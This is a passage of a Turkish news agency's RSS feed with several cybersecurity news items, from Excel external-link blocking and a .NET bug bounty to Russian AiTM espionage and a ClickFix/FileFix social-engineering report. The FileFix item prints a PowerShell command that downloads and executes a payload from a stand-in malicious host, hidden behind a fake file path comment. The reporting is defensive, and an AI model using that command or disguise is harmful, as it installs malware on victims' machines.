<p>Microsoft, Excel kullanıcılarını etkileyen yeni bir güvenlik önlemini hayata geçireceğini duyurdu. 2025 yılı Ekim ayından başlayarak, 2026 Temmuz ayına kadar sürecek aşamalı bir dağıtımla, Excel çalışma kitaplarında engellenen dosya türlerine verilen dış bağlantılar varsayılan olarak devre dışı bırakılacak.</p>
<p>Bu değişiklik, Microsoft 365 içinde yeni sunulan <code>FileBlockExternalLinks</code> grup ilkesi kapsamında uygulanacak. Politika etkinleştirildiğinde ya da yapılandırılmadığında, engellenmiş dosya türlerine yapılacak dış bağlantılar çalışma kitabında <span>"#BLOCKED"</span> hatası gösterecek veya bağlantı yenileme işlemi başarısız olacak.</p>
<p>Microsoft, çarşamba günü Microsoft 365 yönetici merkezinde yayımladığı açıklamada, bu yeni davranışı kullanıcıların önceden fark edebilmesi için Excel’in <strong>Build 2509</strong> sürümüyle birlikte uyarı çubuğu göstermeye başlayacağını bildirdi. <strong>Build 2510</strong> sürümünden itibaren ise politika yapılandırılmamışsa dış bağlantıların yenilenmesi veya oluşturulması mümkün olmayacak.</p>
<p>Şirket açıklamasında, “Varsayılan ayar yapılandırılmazsa ilk etapta herhangi bir değişiklik olmayacak. Ancak Ekim 2025 itibarıyla Trust Center tarafından halihazırda engellenen dosya türlerine dış bağlantılar otomatik olarak engellenecek.” ifadeleri yer aldı.</p>
<p>Bu değişikliğin etkilerini en aza indirmek isteyen yöneticiler, belirtilen kayıt defteri yolunu kullanarak (<code>HKCU\Software\Microsoft\Office<version>\Excel\Security\FileBlock\FileBlockExternalLinks</version></code>) bağlantı yenileme özelliğini manuel olarak yeniden etkinleştirebilecek.</p>
<p>Microsoft bu politika ile birlikte Excel’deki dış bağlantılar üzerinden yapılan oltalama saldırılarına ve kötü amaçlı yüklemelere karşı önlem almayı hedefliyor. Değişiklik, Microsoft’un son yıllarda Office ve Windows ürünlerinde güvenliği artırmaya yönelik attığı adımların bir parçası.</p>
<p>2025 yılı boyunca Microsoft ayrıca Outlook’ta <code>.library-ms</code> ve <code>.search-ms</code> uzantılarını engellenen ekler listesine eklemiş, Microsoft 365 ve Office 2024 uygulamalarında ActiveX kontrollerini tamamen devre dışı bırakmıştı.</p>
<p>Bu önlemler, Microsoft’un 2018'de Office uygulamalarında Antimalware Scan Interface (AMSI) desteğini genişletmesiyle başlayan daha geniş kapsamlı bir güvenlik stratejisinin devamı niteliğinde. Şirket daha önce Office makrolarını varsayılan olarak engellemiş, XLM makrolarını devre dışı bırakmış, VBScript desteğini sonlandıracağını açıklamış ve güvenilmeyen XLL eklentilerini engellemeye başlamıştı.</p>
<p>Aynı gün içinde Microsoft, .NET ve ASP.NET Core açıkları için verilen ödül tutarını <strong>40.000 dolar</strong> seviyesine çıkardığını da duyurdu.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft, .NET ve ASP.NET Core açıkları için ödül miktarını 40.000 dolara çıkardı</title>
<link>https://www.ajansexpres.com.tr/microsoft-net-ve-aspnet-core-aciklari-icin-oedul-miktarini-40000-dolara-cikardi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-net-ve-aspnet-core-aciklari-icin-oedul-miktarini-40000-dolara-cikardi</guid>
<description><![CDATA[ Microsoft, .NET hata ödül programını genişletti ve kritik güvenlik açıkları için ödül üst limitini 40.000 dolara yükseltti. Yeni program, kapsamı ve ödül yapısını sadeleştirerek araştırmacılara daha cazip bir sistem sunmayı hedefliyor. Gelişme, şirketin &quot;Güvenli Gelecek İnisiyatifi&quot; kapsamında atılan adımlardan biri. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948394932ad.webp" length="23982" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:36 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>.NET hata ödül programı ne kadar ödül veriyor, hangi güvenlik açıkları ödül kapsamına alındı, Microsoft’un güvenlik stratejisi nasıl değişiyor, ödül programı hangi teknolojileri kapsıyor</media:keywords>
<content:encoded><![CDATA[<h2>Microsoft, .NET ve ASP.NET Core Güvenlik Ödüllerini Artırdı</h2>
<p>Microsoft, .NET ve ASP.NET Core platformlarındaki güvenlik açıklarını tespit eden araştırmacılar için ödül miktarlarını artırdığını ve hata ödül programının kapsamını genişlettiğini duyurdu. Yeni sistemle birlikte, kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları için ödül miktarı <strong>40.000 dolara</strong> kadar çıkabilecek.</p>
<p>Microsoft’ta Araştırmacı Teşvikleri ve Ödül Programları Kıdemli Yöneticisi <strong>Madeline Eckert</strong>, yapılan değişikliklerin, .NET güvenlik açıklarının keşfi ve sömürülmesindeki teknik karmaşıklığın daha doğru bir şekilde yansıtılmasını amaçladığını belirtti.</p>
<p>Yeni Ödül Yapısı:</p>
<ul>
<li><strong>40.000 dolar:</strong> Kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları</li>
<li><strong>30.000 dolar:</strong> Güvenlik özelliklerini atlatmaya yönelik kritik açıklar</li>
<li><strong>20.000 dolara kadar:</strong> Uzaktan hizmet dışı bırakma (DoS) türündeki kritik açıklar</li>
</ul>
<p>Ödül Programına Yeni Dahil Edilen Teknolojiler:</p>
<ul>
<li>Tüm desteklenen .NET ve ASP.NET sürümleri</li>
<li>F# gibi ilişkili teknolojiler</li>
<li>.NET Framework için desteklenen ASP.NET Core sürümleri</li>
<li>Resmi şablonlar</li>
<li>.NET ve ASP.NET Core GitHub depolarında yer alan GitHub Actions bileşenleri</li>
</ul>
<p>Bu gelişme, Microsoft’un 2023 yılında başlattığı "<em>Secure Future Initiative (SFI)</em>" adlı güvenlik mühendisliği planı kapsamında atılan adımlardan biri olarak öne çıkıyor. Program, şirketin yazılım ürünlerinde güvenliği artırmak amacıyla geliştirdiği uzun vadeli stratejinin bir parçası.</p>
<p>2025 yılı içinde Microsoft ayrıca Power Platform ve Dynamics 365 ürünlerinde yapay zekâ güvenlik açıklarına yönelik ödülleri <strong>30.000 dolara</strong> çıkarmış, Copilot için orta düzey güvenlik açıklarına verilen ödülleri artırmış ve tüm Copilot açıkları için <strong>%100 ödül çarpanı</strong> uygulamaya başlamıştı.</p>
<p>Şirket geçen yıl düzenlediği Ignite konferansında bulut ve yapay zekâ sistemlerine odaklanan "<em>Zero Day Quest</em>" isimli bir etkinlik düzenlemiş, toplamda <strong>4 milyon dolarlık</strong> ödül havuzu açıklamıştı.</p>
<p>Bu adımlar, ABD İç Güvenlik Bakanlığı'nın 2023 sonunda yayımladığı ve Microsoft’un güvenlik kültürünü “yetersiz” olarak nitelendiren raporunun ardından hayata geçirilen yapısal değişikliklerin parçası olarak değerlendiriliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>CISA, Zararlı Yazılım ve Adli Analiz İçin Geliştirilen Thorium Platformunu Açık Kaynak Olarak Yayınladı</title>
<link>https://www.ajansexpres.com.tr/cisa-zararli-yazilim-ve-adli-analiz-icin-gelistirilen-thorium-platformunu-acik-kaynak-olarak-yayinladi</link>
<guid>https://www.ajansexpres.com.tr/cisa-zararli-yazilim-ve-adli-analiz-icin-gelistirilen-thorium-platformunu-acik-kaynak-olarak-yayinladi</guid>
<description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), Sandia Ulusal Laboratuvarları ile ortaklaşa geliştirilen Thorium adlı analiz platformunu açık kaynak olarak paylaştı. Platform, kamu ve özel sektördeki siber güvenlik uzmanlarının kötü amaçlı yazılım analizini ve olay müdahalesini otomatikleştirerek hızlandırmayı hedefliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894838fee671.webp" length="36364" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:31 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Thorium platformu ne işe yarıyor, CISA Thorium’u neden açık kaynak yaptı, kötü amaçlı yazılım analizi nasıl otomatikleştiriliyor, Thorium hangi teknolojileri kullanıyor</media:keywords>
<content:encoded><![CDATA[<h2>CISA, Thorium Platformunu Açık Kaynak Olarak Yayınladı</h2>
<p>ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), kötü amaçlı yazılım ve dijital adli analiz süreçlerini otomatikleştirmeye yönelik geliştirilen <strong>Thorium</strong> platformunun açık kaynak olarak yayınlandığını duyurdu. Thorium, kamu, özel sektör ve devlet kurumlarındaki siber güvenlik uzmanlarına yönelik olarak geliştirildi.</p>
<p>Thorium, CISA ile Sandia Ulusal Laboratuvarları iş birliğiyle geliştirildi ve saniyede <strong>1.700'den fazla işlem</strong> planlayabilme ve saatlik <strong>10 milyon dosya</strong> işleyebilme kapasitesine sahip. Bu altyapı, analiz süreçlerinde yüksek ölçeklenebilirlik ve hız sunuyor.</p>
<p>CISA açıklamasında, “Thorium, ticari, açık kaynaklı ve kuruma özel analiz araçlarını entegre ederek analiz iş akışlarını otomatikleştiriyor. Yazılım analizi, dijital adli inceleme ve olay müdahalesi gibi görevlerde güvenlik ekiplerine kapsamlı destek sağlıyor.” ifadelerine yer verildi.</p>
<p>Thorium’un Temel Özellikleri:</p>
<ul>
<li>Açık kaynak, ticari veya özel komut satırı araçlarının Docker görüntüleri olarak kolayca entegre edilmesi</li>
<li>Araç ve sonuç paylaşımını kolaylaştıran içe/dışa aktarma özellikleri</li>
<li>Etiketleme ve tam metin aramayla sonuç filtreleme</li>
<li>Erişim kontrolleri için grup tabanlı yetkilendirme</li>
<li>Kubernetes ve ScyllaDB entegrasyonu ile ölçeklenebilir yapı</li>
</ul>
<p>CISA Tehdit Avcılığı Başkan Yardımcısı <strong>Jermaine Roebuck</strong>, “Thorium’u açık kaynak olarak sunarak, siber güvenlik topluluğunun zararlı yazılım ve adli analiz için gelişmiş araçları daha etkili şekilde kullanmasını sağlıyoruz.” dedi. Roebuck ayrıca, platformun sadece zararlı yazılımlar değil, potansiyel olarak güvenli yazılımlardaki zafiyetleri de analiz etme olanağı sunduğunu vurguladı.</p>
<p>Thorium’a ait kurulum dökümanları ve kaynak kodları CISA’nın resmî GitHub hesabı üzerinden erişime açıldı.</p>
<p>CISA, bu adımı geçtiğimiz yıl açık kaynak olarak yayımladığı <em>Malware Next-Gen</em> analiz sistemi ve bu hafta duyurduğu <em>Eviction Strategies Tool</em> ile destekledi. Ajans ayrıca kritik altyapı tesislerine yönelik ücretsiz güvenlik taramaları sunmaya da devam ediyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft: Rusya bağlantılı hacker grubu, Moskova’daki büyükelçilikleri ISP düzeyinde yürütülen AiTM saldırılarıyla hedef alıyor</title>
<link>https://www.ajansexpres.com.tr/microsoft-rusya-baglantili-hacker-grubu-moskovadaki-buyukelcilikleri-isp-duzeyinde-yurutulen-aitm-saldirilariyla-hedef-aliyor</link>
<guid>https://www.ajansexpres.com.tr/microsoft-rusya-baglantili-hacker-grubu-moskovadaki-buyukelcilikleri-isp-duzeyinde-yurutulen-aitm-saldirilariyla-hedef-aliyor</guid>
<description><![CDATA[ Microsoft, Rusya Federal Güvenlik Servisi (FSB) ile bağlantılı Secret Blizzard isimli hacker grubunun, Moskova’daki diplomatik misyonları yerel internet servis sağlayıcıları (ISP) üzerinden düzenlenen &quot;adversary-in-the-middle&quot; saldırılarıyla hedef aldığını açıkladı. Grup, sahte antivirüs yazılımı yoluyla kötü amaçlı ApolloShadow zararlı yazılımını sistemlere sızdırıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894838b9023e.webp" length="44384" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:27 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Secret Blizzard grubu kimdir, AiTM saldırıları nasıl gerçekleştiriliyor, ApolloShadow zararlısı ne işe yarıyor, Rusya’daki diplomatik misyonlar hangi siber tehditlerle karşı karşıya</media:keywords>
<content:encoded><![CDATA[<h2>Microsoft, Secret Blizzard Siber Casusluk Grubunun Yeni AiTM Kampanyasını Açıkladı</h2>
<p>Microsoft, Rusya merkezli siber casusluk grubu <strong>Secret Blizzard</strong>’ın, Moskova’daki diplomatik temsilcilikleri hedef alan yeni bir siber kampanya yürüttüğünü açıkladı. Grup, yerel internet servis sağlayıcılarının altyapısını kullanarak <em>adversary-in-the-middle (AiTM)</em> saldırıları gerçekleştiriyor.</p>
<p>Microsoft’un daha önce <em>Turla, Waterbug</em> ve <em>Venomous Bear</em> gibi adlarla da takip ettiği bu grup, hedef kullanıcıları sahte Kaspersky antivirüs yükleyicisiyle kandırarak <strong>ApolloShadow</strong> adlı özel zararlı yazılımı sistemlere yerleştiriyor. Saldırının temel yöntemi, kurbanları captive portal’lara yönlendirmek ve buradan kötü amaçlı dosyaları indirmeye zorlamak.</p>
<p>ApolloShadow sistemlere yüklendikten sonra, sahte bir Kaspersky root sertifikası da kuruyor. Bu sertifika, saldırganların zararlı siteleri meşru gibi göstermesini sağlıyor ve sistemde kalıcı erişim elde etmelerine imkân tanıyor.</p>
<p>Microsoft, “Bu, Secret Blizzard grubunun ISP düzeyinde istihbarat toplama yeteneğini ilk kez doğruladığımız bir örnektir. Rusya’daki yerel internet sağlayıcılarını kullanan diplomatik personel, yüksek risk altındadır.” açıklamasında bulundu.</p>
<p>Saldırı zincirinin Şubat 2025'te tespit edildiği, ancak kampanyanın en azından 2024’ten bu yana aktif olduğu belirtiliyor. Microsoft ayrıca, saldırganların Rusya’daki resmi gözetim altyapısı <strong>SORM</strong> (System for Operative Investigative Activities) üzerinden AiTM saldırılarını yaygınlaştırdığını belirtti.</p>
<h3>Yüksek Profilli Hedeflere Yönelik Sıra Dışı Taktikler</h3>
<p>Secret Blizzard, 1996'dan bu yana dünya genelinde 100'den fazla ülkede elçilikleri, devlet kurumlarını ve araştırma merkezlerini hedef alan siber casusluk faaliyetleri yürütüyor. Grup, iki yıl önce ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) tarafından FSB’nin 16. Merkezi ile ilişkilendirilmişti.</p>
<p>Geçmişte, Britney Spears’ın Instagram gönderilerine yazılan yorumlar üzerinden kötü amaçlı yazılımları kontrol ettikleri ve İranlı APT grubu OilRig'in altyapısını kullanarak saldırılarını gizlemeye çalıştıkları tespit edilmişti. Ayrıca, yakın zamanda Pakistanlı Storm-0156 grubunun altyapısını ele geçirerek Ukrayna askeri cihazlarını Starlink bağlantıları üzerinden hedef aldıkları bildirildi.</p>
<p>Secret Blizzard grubunun, ABD Merkez Kuvvetler Komutanlığı (CENTCOM), NASA, Pentagon, Finlandiya Dışişleri Bakanlığı, AB devletleri ve büyükelçiliklerini de hedef aldığı biliniyor.</p>
<p>Microsoft, özellikle diplomatik kurumlar ve yerel ağ altyapısına bağlı çalışan tüm kuruluşlar için <strong>ciddi güvenlik önlemleri</strong> alınması gerektiğini vurguladı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ClickFix ve FileFix saldırıları, tarayıcıdan işletim sistemine uzanan yeni sosyal mühendislik tehditlerini ortaya koyuyor</title>
<link>https://www.ajansexpres.com.tr/clickfix-ve-filefix-saldirilari-tarayicidan-isletim-sistemine-uzanan-yeni-sosyal-muhendislik-tehditlerini-ortaya-koyuyor</link>
<guid>https://www.ajansexpres.com.tr/clickfix-ve-filefix-saldirilari-tarayicidan-isletim-sistemine-uzanan-yeni-sosyal-muhendislik-tehditlerini-ortaya-koyuyor</guid>
<description><![CDATA[ ClickFix adı verilen yeni nesil sosyal mühendislik saldırıları, kullanıcıların tarayıcıdan panoya kopyalanan zararlı komutları kendi elleriyle çalıştırmalarını sağlıyor. Son varyantı FileFix ile birlikte bu teknikler, sistemde uzaktan erişim truva atları, veri hırsızları ve kalıcı kötü amaçlı yazılımlar oluşturmak için kullanılabiliyor. Uzmanlar, bu tehditlerin ancak tarayıcı düzeyinde gerçek zamanlı korumayla durdurulabileceğini belirtiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948386ee73d.webp" length="37176" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:22 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ClickFix saldırısı nasıl çalışıyor, FileFix tekniği nasıl işliyor, zararlı kodlar tarayıcıdan işletim sistemine nasıl geçiyor, tarayıcı tabanlı güvenlik çözümleri ne işe yarıyor</media:keywords>
<content:encoded><![CDATA[<h2>Keep Aware’dan ClickFix ve FileFix Saldırılarına Dair Yeni Analiz</h2>
<p>Siber güvenlik platformu <strong>Keep Aware</strong> tarafından yayımlanan yeni bir analiz, <strong>ClickFix</strong> olarak adlandırılan tarayıcı kaynaklı sosyal mühendislik saldırısının detaylarını ortaya koydu. Bu saldırılar, kullanıcıların farkında olmadan tarayıcıdan panoya kopyalanan zararlı kodları çalıştırmalarına neden olarak sistemin ele geçirilmesine zemin hazırlıyor.</p>
<h3>Sessiz Tehdit: ClickFix Nedir</h3>
<p>ClickFix saldırıları, genellikle sahte CAPTCHA doğrulamaları gibi kullanıcıdan "bir şeyi düzeltmesi" istenen görseller üzerinden başlatılıyor. Kullanıcı bir öğeye tıkladığında, tarayıcı sessizce panoya zararlı PowerShell komutları kopyalıyor. Ardından kullanıcıya bu kodu terminale yapıştırması gerektiği söyleniyor. Bu işlem, kötü amaçlı yazılımın çalıştırılmasına neden oluyor.</p>
<p>Keep Aware tarafından paylaşılan gerçek bir vaka analizinde, bir kullanıcı arama motoru sonuçlarında karşılaştığı bir siteye tıkladıktan sonra ClickFix saldırısına maruz kaldı. Sayfa, panoya NetSupport Manager uzaktan erişim truva atı içeren PowerShell kodunu kopyaladı ve çalıştırılması yönünde kullanıcıyı yönlendirdi. Keep Aware’ın tarayıcı güvenlik çözümleri sayesinde saldırı gerçekleşmeden engellendi.</p>
<h3>Yeni Varyant: FileFix</h3>
<p>Haziran 2025'te araştırmacı mr.d0x tarafından belgelenen <strong>FileFix</strong>, ClickFix’in gelişmiş bir versiyonu olarak ortaya çıktı. FileFix’te kullanıcı, panoya gizlenmiş PowerShell komutlarını doğrudan Windows Dosya Gezgini'nin adres çubuğuna yapıştırmaya ikna ediliyor. Komutun ardından gelen dosya yolu yorum satırı olarak ekleniyor ve tehdit gizleniyor:</p>
<pre>Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:\Organization\Internal\Drive\Business-RFP.pdf
  </pre>
<p>Bu tür saldırılarda, kullanıcının zararlı kodu fark etmesi zorlaşıyor çünkü adres çubuğu yalnızca dosya yolu kısmını gösteriyor.</p>
<h3>Kalıcı Tehdit: RAT ve Stealer Yüklemeleri</h3>
<p>ClickFix ve FileFix saldırıları, kullanıcıyı aktif olarak kodu çalıştırmaya yönlendirerek AsyncRAT, Lumma Stealer, DarkGate, DanaBot gibi kötü amaçlı yazılımların sisteme yerleşmesini sağlıyor. Panoya kopyalanan kod, indirilen dosyaları açıyor, çözümleyerek sistemde kalıcılık sağlayan arka kapılar kuruyor.</p>
<h3>Koruma Nereden Başlamalı</h3>
<p>Uzmanlara göre bu tür saldırılar, klasik antivirüs ve güvenlik duvarı çözümlerini aşabiliyor. Bu nedenle tarayıcı düzeyinde, panoya erişimi izleyen ve zararlı komutları gerçek zamanlı engelleyen çözümler kullanılmalı. Keep Aware, ClickFix ve FileFix saldırılarını tarayıcıda tespit ederek henüz çalıştırılmadan durdurabildiğini belirtiyor.</p>
<h3>Tarayıcı Güvenliği Öncelik Haline Geliyor</h3>
<p>Keep Aware, bu saldırıların güvenlik stratejilerindeki en büyük açık olan tarayıcı alanını hedef aldığını vurguluyor. Şirket, bu nedenle tarayıcı merkezli güvenlik yaklaşımı geliştirdiklerini ve Black Hat USA 2025 etkinliğinde sunum yapacak dört Startup Spotlight finalistinden biri seçildiklerini açıkladı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yeni güvenlik açıklarının yüzde 80’inden önce ağda anormal hareketlilik gözleniyor</title>
<link>https://www.ajansexpres.com.tr/yeni-guvenlik-aciklarinin-yuzde-80inden-oence-agda-anormal-hareketlilik-goezleniyor</link>
<guid>https://www.ajansexpres.com.tr/yeni-guvenlik-aciklarinin-yuzde-80inden-oence-agda-anormal-hareketlilik-goezleniyor</guid>
<description><![CDATA[ GreyNoise tarafından yayımlanan araştırma, güvenlik açıkları (CVE) kamuoyuna açıklanmadan önce geçen haftalarda ağ taramaları, brute-force saldırıları ve keşif faaliyetlerinde belirgin artış yaşandığını ortaya koydu. Bu davranışsal örüntü, saldırganların yeni açıklar ortaya çıkmadan önce hazırlık yaptığını gösteriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483824e61c.webp" length="50362" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:18 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>yeni CVE’ler öncesinde neler yaşanıyor, ağ tarama faaliyetleri nasıl analiz ediliyor, saldırganlar eski açıkları neden hâlâ kullanıyor, güvenlik açıklarına karşı erken uyarı nasıl mümkün olabilir</media:keywords>
<content:encoded><![CDATA[<h2>GreyNoise Analizi: Güvenlik Açığı Duyuruları Öncesinde Ağ Trafiğinde Anormal Artış</h2>
<p>Siber tehdit istihbarat firması <strong>GreyNoise</strong>, 2024 yılından bu yana topladığı verilerle gerçekleştirdiği analizde, güvenlik açıkları kamuya duyurulmadan önce geçen altı haftalık sürede ağ trafiğinde olağan dışı bir artış olduğunu tespit etti. Şirketin verilerine göre, incelenen olayların %80’inde, CVE (Common Vulnerabilities and Exposures) açıklamaları öncesinde saldırgan faaliyetlerinde ani sıçramalar yaşanıyor.</p>
<p>Araştırmada kullanılan veriler, GreyNoise’un küresel tarama verileri sağlayan <em>Global Observation Grid (GOG)</em> platformundan elde edildi. İstatistiksel güvenilirlik sağlamak adına düşük kaliteli ve gürültülü veriler analiz dışı bırakıldı ve toplam 216 anormal trafik olayı değerlendirmeye alındı. Bu olaylar, aralarında Ivanti, SonicWall, Palo Alto Networks, Fortinet, MikroTik, Citrix ve Cisco gibi sekiz büyük uç ağ cihazı üreticisini kapsıyor.</p>
<p>GreyNoise, “İncelediğimiz 216 trafik artışının %50’si üç hafta içinde, %80’i ise altı hafta içinde yeni bir güvenlik açığı duyurusu ile sonuçlandı.” açıklamasında bulundu.</p>
<h3>Eski Açıklar Taranıyor, Yeni Saldırılar Hazırlanıyor</h3>
<p>Araştırmacılara göre bu trafik artışları genellikle daha önce bilinen açıklara yönelik taramalardan oluşuyor. Ancak bu taramaların amacı sadece bu eski açıkları sömürmek değil, aynı zamanda yeni zafiyetlerin keşfi ya da ağa açık sistemlerin haritalanması gibi sonraki aşamalar için zemin hazırlamak.</p>
<h3>Savunma İçin Erken Uyarı Mekanizması</h3>
<p>GreyNoise, bu tür trafik artışlarının savunma ekipleri için bir tür “erken uyarı” niteliği taşıdığını belirtiyor. Bu sayede, bir güvenlik yaması yayınlanmamış olsa dahi sistem yöneticileri önceden hazırlık yapabiliyor, izleme sistemlerini güçlendirebiliyor ve riskli IP’leri kara listeye alabiliyor.</p>
<p>Özellikle devlet destekli tehdit gruplarının, uç nokta cihazlarını ilk erişim ve kalıcılık amacıyla hedef aldığı biliniyor. Bu da ağ üzerindeki anormal hareketliliklerin göz ardı edilmemesi gerektiğini gösteriyor.</p>
<h3>Google Project Zero’dan Paralel Adım</h3>
<p>Bu gelişmeyle eş zamanlı olarak, Google’ın Project Zero ekibi de önemli bir politika değişikliğini duyurdu. Buna göre yeni bir güvenlik açığı tespit edildiğinde, artık teknik detay verilmeden yalnızca hangi ürünün etkilendiği, ne zaman keşfedildiği ve açıklama süresi gibi temel bilgiler bir hafta içinde kamuoyuyla paylaşılacak. Amaç, yazılım tedarikçileri güncelleme hazırlarken sistem yöneticilerinin savunmasını hızla güçlendirebilmesini sağlamak.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Proton, Windows ve mobil cihazlar için ücretsiz ve açık kaynaklı 2FA uygulaması yayımladı</title>
<link>https://www.ajansexpres.com.tr/proton-windows-ve-mobil-cihazlar-icin-ucretsiz-ve-acik-kaynakli-2fa-uygulamasi-yayimladi</link>
<guid>https://www.ajansexpres.com.tr/proton-windows-ve-mobil-cihazlar-icin-ucretsiz-ve-acik-kaynakli-2fa-uygulamasi-yayimladi</guid>
<description><![CDATA[ Proton, kullanıcıların çevrimdışı olarak tek kullanımlık doğrulama kodları oluşturmasını sağlayan Proton Authenticator adlı yeni iki faktörlü kimlik doğrulama (2FA) uygulamasını tanıttı. Windows, macOS, Linux, Android ve iOS için sunulan uygulama reklamsız, takipçisiz ve tamamen açık kaynaklı olarak dikkat çekiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894837e42352.webp" length="23122" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:14 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Proton Authenticator nasıl çalışıyor, uygulama hangi cihazları destekliyor, TOTP kodları neden daha güvenli, 2FA için açık kaynak alternatifleri neler sunuyor</media:keywords>
<content:encoded><![CDATA[<h2>Proton, Yeni Proton Authenticator Uygulamasını Yayınladı</h2>
<p>Gizlilik odaklı hizmetleriyle tanınan İsviçre merkezli teknoloji şirketi <strong>Proton</strong>, yeni <strong>Proton Authenticator</strong> uygulamasını yayımladığını duyurdu. Uygulama, Windows, macOS, Linux, Android ve iOS platformlarında çalışıyor ve tamamen ücretsiz olarak indirilebiliyor.</p>
<p>Proton Authenticator, çevrimdışı çalışan ve her 30 saniyede bir yenilenen zaman tabanlı tek kullanımlık şifreler (TOTP) üreterek kullanıcıların çevrimiçi hesaplarını daha güvenli hale getiriyor. Bu kodlar, parolaların yanı sıra ikinci bir doğrulama katmanı olarak kullanılıyor.</p>
<p>Uygulama, reklam içermiyor, kullanıcı takibi yapmıyor ve Proton hesabı gerektirmeden kullanılabiliyor. Bu yönüyle Google Authenticator, Microsoft Authenticator ve Authy gibi yaygın uygulamalardan ayrılıyor. Proton yetkilileri, “Bu uygulama, gizlilik, şeffaflık ve kullanıcı odaklı güvenlik ilkeleriyle geliştirildi” açıklamasında bulundu.</p>
<h3>Proton Authenticator’ın Öne Çıkan Özellikleri</h3>
<ul>
<li>Tamamen çevrimdışı çalışabilen zaman tabanlı doğrulama kodları,</li>
<li>Uçtan uca şifreli çoklu cihaz senkronizasyonu,</li>
<li>Diğer platformlara geçişi kolaylaştıran içe/dışa aktarma özelliği,</li>
<li>Biyometrik ya da PIN ile uygulama kilitleme,</li>
<li>Otomatik şifreli yedekleme sistemi,</li>
<li>Kullanıcı verilerinin hiçbir Proton sunucusuna gönderilmemesi,</li>
<li>Yakında yayımlanması planlanan açık kaynak kod yapısı.</li>
</ul>
<p>Ayrıca Proton Authenticator, pek çok popüler uygulamada olmayan bir özellikle geliyor: TOTP anahtarlarının dışa aktarılabilmesi, yani kullanıcıların tüm hesaplarını başka bir cihaza veya uygulamaya taşırken veri kaybı yaşamaması mümkün hale geliyor.</p>
<p>Bu tür uygulamalar, SMS veya e-posta üzerinden gönderilen doğrulama kodlarına göre çok daha güvenli kabul ediliyor. Çünkü kodlar yerel olarak üretiliyor, kısa sürede geçersiz hale geliyor ve phishing, SIM değişimi veya ortadaki adam (MITM) saldırılarına karşı dayanıklı bir yapı sunuyor.</p>
<p>Proton, bu yeni uygulamasıyla kullanıcıları büyük teknoloji şirketlerinin kapalı ve takip temelli ekosistemlerinden kurtarmayı hedeflediğini belirtti. Kaynak kodunun önümüzdeki haftalarda Proton’un GitHub hesabında yayımlanması bekleniyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ShinyHunters, Qantas ve Allianz dahil çok sayıda şirketin verilerini Salesforce üzerinden hedef aldı</title>
<link>https://www.ajansexpres.com.tr/shinyhunters-qantas-ve-allianz-dahil-cok-sayida-sirketin-verilerini-salesforce-uzerinden-hedef-aldi</link>
<guid>https://www.ajansexpres.com.tr/shinyhunters-qantas-ve-allianz-dahil-cok-sayida-sirketin-verilerini-salesforce-uzerinden-hedef-aldi</guid>
<description><![CDATA[ ShinyHunters isimli siber suç grubu, Qantas, Allianz Life, LVMH ve Adidas gibi firmalara yönelik saldırılarda Salesforce sistemlerini hedef aldı. Saldırılar, telefonla sosyal mühendislik yoluyla bağlantılı uygulamalar aracılığıyla veri erişimi sağlayan kimlik avı kampanyalarıyla gerçekleştirildi. Şirketlerden veri çalındığı doğrulandı, ancak henüz kamuya açık bir sızıntı yaşanmadı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483799c1a7.webp" length="64040" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:09 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ShinyHunters saldırısında hangi yöntemler kullanıldı, hangi şirketler etkilendi, saldırılar Salesforce açıklarını mı hedef alıyor, sosyal mühendisliğe karşı hangi güvenlik önlemleri alınmalı</media:keywords>
